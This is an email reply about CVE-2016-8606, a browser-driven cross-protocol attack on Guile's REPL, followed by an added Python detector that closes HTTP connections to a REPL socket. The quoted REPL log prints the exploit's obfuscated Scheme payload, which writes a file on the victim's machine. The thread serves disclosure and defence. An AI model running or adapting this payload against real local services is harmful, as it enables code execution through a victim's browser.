Hi Christopher,

On 10/16, Christopher Allan Webber wrote:
> So, I guess this will work from a public site as well?

Yes! The HTML I mentioned in my post is available here: (Though note that it won't work if you visit it over HTTPS, since HTTPS documents aren't allowed to XHR to HTTP.)

If you visit it while a guile 2.0.13 repl is listening on 37146, you'll see this:

[lizzie@empress b.l.i]$ guile --listen
GNU Guile 2.0.13
Copyright (C) 1995-2016 Free Software Foundation, Inc.

Guile comes with ABSOLUTELY NO WARRANTY; for details type `,show w'.
This program is free software, and you are welcome to redistribute it
under certain conditions; type `,show c' for details.

Enter `,help' for help.
scheme@(guile-user)>
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@ POSSIBLE BREAK-IN ATTEMPT ON THE REPL SERVER @@
@@ BY AN HTTP INTER-PROTOCOL EXPLOITATION ATTACK. See: @@
@@ @@
@@ Possible HTTP request received: "GET /?(let((ascii(((lambda(x)x)reverse)(((lambda(x)x)char-set-fold)((lambda(x)x)cons)(((lambda(x)x)make-list)((lambda(x)x)0))((lambda(x)x)char-set:ascii)))))(((lambda(x)x)with-output-to-file)(((lambda(x)x)string)(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)110))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)111))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)116))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)101))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)46))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)116))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)120))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)116)))(lambda()(((lambda(x)x)display)(((lambda(x)x)string)(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)62))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)58))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)41))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)10))))))) HTTP/1.1\r\nHost: localhost:37146\r\nConnection: keep-alive\r\nOrigin: http://s3-us-west-2.amazonaws.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36\r\nAccept: */*\r\nReferer: http://s3-us-west-2.amazonaws.com/blog.lizzie.io/exploiting-CVE-2016-8606-exploit.html\r\nAccept-Encoding: gzip, deflate, sdch\r\nAccept-Language: en-US,en;q=0.8\r\n\r\n"
@@ The associated socket has been closed. @@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

I don't recommend visiting it while a 2.0.12 repl is open, but it will write a file in that case.

> I'm always a bit fuzzy about what browsers do and don't allow, but
> I'm stunned that a browser will let a request from some
> http://foo.example/ to http://localhost:37146/, even for just a GET.
> It seems like there are all sorts of daemons you can exploit that
> way.

It's a little absurd, yeah. :/ Maybe this string of exploits will convince others to reconsider, but probably this kind of vulnerability will be around for a while.

Thanks,
Lizzie.
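The 2.0.13 warning above shows the defensive idea at the heart of the fix: a listener that speaks a line-oriented REPL protocol can recognise the shape of an HTTP request line on its socket and close the connection instead of evaluating what follows. The Python below is an added example written for this page, not Guile's own code and not part of the thread; the function names (`looks_like_http_request`, `summarize_http_request`, `guard_repl_connection`), the header list and the two sample inputs are all my own constructions. It checks the first bytes received against the RFC 7230 request-line shape, and when they match, extracts the Host, Origin and Referer headers so the event can be logged with the origin that issued the cross-protocol request.

```python
import re
from typing import Optional, Tuple

# Request-line shape from RFC 7230: METHOD SP request-target SP HTTP/major.minor CRLF.
# Methods are upper-case tokens; browsers never send a lower-case one.
HTTP_REQUEST_LINE = re.compile(rb"^([A-Z]{3,10}) (\S+) HTTP/(\d)\.(\d)\r?\n")

# Headers worth recording when an HTTP request arrives on a non-HTTP listener:
# they identify which page (and which host) drove the browser to this port.
INTERESTING_HEADERS = (b"host", b"origin", b"referer", b"user-agent")


def looks_like_http_request(data: bytes) -> bool:
    """True if the data begins with a well-formed HTTP request line."""
    return HTTP_REQUEST_LINE.match(data) is not None


def summarize_http_request(data: bytes) -> Optional[dict]:
    """Parse method, target, version and selected headers for logging.

    Returns None when the data does not start with an HTTP request line.
    Malformed header lines are skipped, not rejected: this is a log record,
    nothing downstream routes on it.
    """
    m = HTTP_REQUEST_LINE.match(data)
    if m is None:
        return None
    summary = {
        "method": m.group(1).decode("ascii"),
        "target": m.group(2).decode("ascii", "replace"),
        "version": f"{m.group(3).decode()}.{m.group(4).decode()}",
        "headers": {},
    }
    # Headers end at the first blank line; stop there so a body is never parsed.
    head, _, _ = data[m.end():].partition(b"\r\n\r\n")
    for line in head.split(b"\r\n"):
        name, sep, value = line.partition(b":")
        if not sep:
            continue
        key = name.strip().lower()
        if key in INTERESTING_HEADERS:
            summary["headers"][key.decode()] = value.strip().decode("latin-1", "replace")
    return summary


def guard_repl_connection(first_bytes: bytes) -> Tuple[str, Optional[dict]]:
    """Decide what a REPL server should do with the first bytes of a connection.

    ("close", summary) means the peer sent HTTP: close the socket and log the
    summary without evaluating anything. ("accept", None) means plain REPL input.
    """
    summary = summarize_http_request(first_bytes)
    if summary is not None:
        return ("close", summary)
    return ("accept", None)


# Constructed sample: the shape of a request a browser sends when a page on
# another origin issues an XHR to a local REPL port. The target is a harmless
# expression and the origin is made up for this example.
SAMPLE_BROWSER_REQUEST = (
    b"GET /?(display%20%22hello%22) HTTP/1.1\r\n"
    b"Host: localhost:37146\r\n"
    b"Connection: keep-alive\r\n"
    b"Origin: http://other-origin.example\r\n"
    b"User-Agent: Mozilla/5.0 (constructed)\r\n"
    b"Accept: */*\r\n"
    b"Referer: http://other-origin.example/page.html\r\n"
    b"\r\n"
)

# Constructed sample: what a genuine REPL client sends, a Scheme form with no
# HTTP framing at all.
SAMPLE_REPL_INPUT = b"(+ 1 2)\n"

if __name__ == "__main__":
    for sample in (SAMPLE_BROWSER_REQUEST, SAMPLE_REPL_INPUT):
        verdict, info = guard_repl_connection(sample)
        print(verdict, info)
```

Two design points follow from the thread. First, binding the REPL to 127.0.0.1 does not help here, because the request comes from a browser on the same machine, which is why the check has to look at the bytes rather than the peer address. Second, the summary keeps Origin and Referer precisely because they are the only record of which page triggered the request, which is what an incident responder would want in the log.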